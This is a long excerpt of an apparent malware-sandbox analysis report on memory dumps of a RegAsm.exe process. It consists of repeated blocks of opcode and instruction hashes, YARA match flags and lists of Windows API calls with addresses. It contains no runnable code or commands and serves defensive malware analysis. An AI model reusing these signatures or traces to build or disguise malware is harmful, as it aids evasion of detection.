                                                                                                                            • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                                                                                            • Opcode Fuzzy Hash: eeff4f7349616e56738bbc7b8787175557d4d7270555fb13a45f0baf29077f94
                                                                                                                            • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                                                            • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                                                                                                            • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                                                            • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                                                                                                            APIs
                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionRaise
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3997070919-0
                                                                                                                            • Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                            • Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
                                                                                                                            • Opcode Fuzzy Hash: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
                                                                                                                            • Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
                                                                                                                            APIs
                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00453326,?,?,00000008,?,?,004561DD,00000000), ref: 00453558
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionRaise
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3997070919-0
                                                                                                                            • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                            • Instruction ID: ef9cfcefdd20db456822e604066c987cb5d00f1002a97bdaec88d2537339d9b1
                                                                                                                            • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                                                                                                            • Instruction Fuzzy Hash: 40B16C311106089FD715CF28C48AB657BE0FF053A6F258659EC9ACF3A2C739DA96CB44
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 0-4108050209
                                                                                                                            • Opcode ID: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                                                                                                            • Instruction ID: aa2317f629b7fe23c078ec1ce6c5eb8ae6c7f7e5ba67e2b2e47e92e01b9ebfde
                                                                                                                            • Opcode Fuzzy Hash: 1f1efbfc6b98b7ff63776831a751ef1758ce1d1abb45475947e68a2c5420a09b
                                                                                                                            • Instruction Fuzzy Hash: A4126F32B083008BD714EF6AD851A1FB3E2BFCC758F15892EF585A7391DA34E9058B46
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1663032902-0
                                                                                                                            • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                                                                            • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                                                                                            • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                                                                                            • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2692324296-0
                                                                                                                            • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                            • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                                                                                            • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                                                                            • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                                                                                            • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1272433827-0
                                                                                                                            • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                                                                            • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                                                                                            • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                                                                                            • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                                                                              • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                              • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                                                                              • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                            • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1084509184-0
                                                                                                                            • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                                                                            • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                                                                                            • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                                                                                            • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                            • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                            • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                                            • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 0-4108050209
                                                                                                                            • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                            • Instruction ID: cdd912994a32e16cda9accbda93f1ea0618352901e275441ec4d65c4c105c2b3
                                                                                                                            • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                            • Instruction Fuzzy Hash: 9C514771603648A7DF3489AB88567BF63899B0E344F18394BD882C73C3C62DED02975E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 0-2766056989
                                                                                                                            • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                            • Instruction ID: e4f6ca204f58efd2523fb0dbef6dba8f744ce0bfcff40a2940ff04dc0a880f4e
                                                                                                                            • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                                                                            • Instruction Fuzzy Hash: A841FB75A187558BC340CF29C58061BFBE1FFD8318F655A1EF889A3350D375E9428B86
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.887505450.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.887477311.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.887505450.0000000010001000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                            • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                                                                                                                            • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                            • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                                                                                                            • Instruction ID: ecf94096385373c2e9f2c5c276bef480e2dc0267d4a411ba40625ecd8b408152
                                                                                                                            • Opcode Fuzzy Hash: 5da51411db3bde963f465f05a0d8b0dbce9b500299d5c90620e57fed4b77625f
                                                                                                                            • Instruction Fuzzy Hash: 7F323831D69F014DE7239A35C862336A289BFB73C5F15D737F816B5AAAEB28C4834105
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                                                                                                            • Instruction ID: 709358690f7fb2d2e3012b2358c769367bf3ff6314f01af24d3ecfcd65fe7181
                                                                                                                            • Opcode Fuzzy Hash: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                                                                                                            • Instruction Fuzzy Hash: 443290716087459BD715DE28C4807AAB7E1BF84318F044A3EF89587392D778DD8BCB8A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                                                                                                                            • Instruction ID: c5d71c01a3a4c2ba568a1e95f45065819b1df519d68335ab1a8a94a68da0c1ef
                                                                                                                            • Opcode Fuzzy Hash: f41a5a7a899c2c5ffe641ad63b885c2af5ab7072673c771f4bdde5d7e27c8b4e
                                                                                                                            • Instruction Fuzzy Hash: 1002BFB17146519BC318CF2EEC8053AB7E1BB8D301745863EE495C7795EB34E922CB98
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                                                                                                                            • Instruction ID: 4a18c9c21abf6ab3d0e9afb34562907cd60dbb70f6b305f111ae620774dcdf5c
                                                                                                                            • Opcode Fuzzy Hash: ab468733ab78125ba0c04a3e06e770d81fa6048f74458c9db32780a1fb096c70
                                                                                                                            • Instruction Fuzzy Hash: 42F18C716142559FC304DF1EE89182BB3E1FB89301B450A2EF5C2C7391DB79EA16CB9A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                            • Instruction ID: b3ba5b81110409d95a5723b53b6c8744913893e641e186edab39e166e1bc966b
                                                                                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                            • Instruction Fuzzy Hash: 7DC1B1723091930ADF2D4A3D853453FFBA15AA57B171A275FE8F2CB2C1EE18C524D524
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                            • Instruction ID: 7f684bb0481695d58232a2b0d47c85f4cbd32b92c5f53758fc2a28b9861b6fac
                                                                                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                            • Instruction Fuzzy Hash: EAC1C5723092930ADF2D463D853453FFBA15AA57B171A275EE8F2CB2C5FE28C524C614
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                            • Instruction ID: b4bbf9256ac03f5d23606f900b1ff113549fac5ad7a5b3908127750d008d8003
                                                                                                                            • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                            • Instruction Fuzzy Hash: FDC1B0B230D1930ADB3D4A3D953453FBBA15AA63B171A275ED8F2CB2C1FE18C524D624
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                            • Instruction ID: c0cc860fb011aaa8bec1e183ca1ba44e4399d72b3d9d4532b0ef978257cdf629
                                                                                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                            • Instruction Fuzzy Hash: 08C1A0B230D1930ADB3D463D853853FBBA15AA67B171A276ED8F2CB2C1FE18C524D614
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                                                                                                            • Instruction ID: 79373b44a76dcf5e8091c0b891bec819a00bcae964dee749e010b71610d2b526
                                                                                                                            • Opcode Fuzzy Hash: e161149dfcfde14b0cd5a29c2f169de042b37c027391bcdbe844d1d06cbdb277
                                                                                                                            • Instruction Fuzzy Hash: F7B1A5795142998ACF05EF28C4913F63BA1EF6A300F4851B9EC9DCF757D2398506EB24
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 912b91bcee59c5ac73c124bb0811566e2b40e5b970351445414cbd9e4b54fd2a
                                                                                                                            • Instruction ID: 9176630f27626b4b14444871c43cfb7a364794bde640040d1d9abeeee83df0d0
